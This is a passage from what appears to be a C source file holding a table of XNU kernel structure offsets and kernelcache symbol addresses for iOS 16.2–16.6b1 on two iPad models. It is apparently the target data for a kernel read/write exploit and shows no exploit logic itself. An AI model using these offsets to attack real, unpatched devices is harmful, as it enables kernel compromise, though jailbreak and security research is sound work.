0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f1208, .kernelcache__gPhysBase = 0xfffffe0007a63fc0, .kernelcache__gPhysSize = 0xfffffe0007a63fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a62198, .kernelcache__perfmon_devices = 0xfffffe000aa2f520, .kernelcache__perfmon_dev_open = 0xfffffe00080a43c0, .kernelcache__ptov_table = 0xfffffe00079af188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2e990, .kernelcache__vm_pages = 0xfffffe00079abeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ae128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2e988, .kernelcache__vn_kqfilter = 0xfffffe00080f32b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f9288, .kernelcache__gPhysBase = 0xfffffe0007a64100, .kernelcache__gPhysSize = 0xfffffe0007a64100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a622d8, .kernelcache__perfmon_devices = 0xfffffe000aa37520, .kernelcache__perfmon_dev_open = 0xfffffe00080a45c0, .kernelcache__ptov_table = 0xfffffe00079af188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa36990, .kernelcache__vm_pages = 0xfffffe00079abeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ae128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa36988, .kernelcache__vn_kqfilter = 0xfffffe00080f374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Air 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a91d190, .kernelcache__gPhysBase = 0xfffffe00079840c8, .kernelcache__gPhysSize = 0xfffffe00079840c8 + 8, .kernelcache__gVirtBase = 0xfffffe00079822a8, .kernelcache__perfmon_devices = 0xfffffe000a9583b0, .kernelcache__perfmon_dev_open = 0xfffffe0008087f50, .kernelcache__ptov_table = 0xfffffe00078cf378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a957800, .kernelcache__vm_pages = 0xfffffe00078cc090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ce328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9577f8, .kernelcache__vn_kqfilter = 0xfffffe00080da50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a925190, .kernelcache__gPhysBase = 0xfffffe00079841b0, .kernelcache__gPhysSize = 0xfffffe00079841b0 + 8, .kernelcache__gVirtBase = 0xfffffe0007982390, .kernelcache__perfmon_devices = 0xfffffe000a9603b0, .kernelcache__perfmon_dev_open = 0xfffffe0008087cc4, .kernelcache__ptov_table = 0xfffffe00078cf3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a95f800, .kernelcache__vm_pages = 0xfffffe00078cc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ce368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a95f7f8, .kernelcache__vn_kqfilter = 0xfffffe00080da280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a925190, .kernelcache__gPhysBase = 0xfffffe00079841b0, .kernelcache__gPhysSize = 0xfffffe00079841b0 + 8, .kernelcache__gVirtBase = 0xfffffe0007982390, .kernelcache__perfmon_devices = 0xfffffe000a9603b0, .kernelcache__perfmon_dev_open = 0xfffffe0008087cc4, .kernelcache__ptov_table = 0xfffffe00078cf3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a95f800, .kernelcache__vm_pages = 0xfffffe00078cc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ce368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a95f7f8, .kernelcache__vn_kqfilter = 0xfffffe00080da280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f1208, .kernelcache__gPhysBase = 0xfffffe0007a63fc0, .kernelcache__gPhysSize = 0xfffffe0007a63fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a62198, .kernelcache__perfmon_devices = 0xfffffe000aa2f520, .kernelcache__perfmon_dev_open = 0xfffffe00080a43c0, .kernelcache__ptov_table = 0xfffffe00079af188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2e990, .kernelcache__vm_pages = 0xfffffe00079abeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ae128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2e988, .kernelcache__vn_kqfilter = 0xfffffe00080f32b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f1208, .kernelcache__gPhysBase = 0xfffffe0007a63fc0, .kernelcache__gPhysSize = 0xfffffe0007a63fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a62198, .kernelcache__perfmon_devices = 0xfffffe000aa2f520, .kernelcache__perfmon_dev_open = 0xfffffe00080a43c0, .kernelcache__ptov_table = 0xfffffe00079af188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2e990, .kernelcache__vm_pages = 0xfffffe00079abeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ae128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2e988, .kernelcache__vn_kqfilter = 0xfffffe00080f32b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f9288, .kernelcache__gPhysBase = 0xfffffe0007a64100, .kernelcache__gPhysSize = 0xfffffe0007a64100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a622d8, .kernelcache__perfmon_devices = 0xfffffe000aa37520, .kernelcache__perfmon_dev_open = 0xfffffe00080a45c0, .kernelcache__ptov_table = 0xfffffe00079af188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa36990, .kernelcache__vm_pages = 0xfffffe00079abeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ae128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa36988, .kernelcache__vn_kqfilter = 0xfffffe00080f374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,17", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 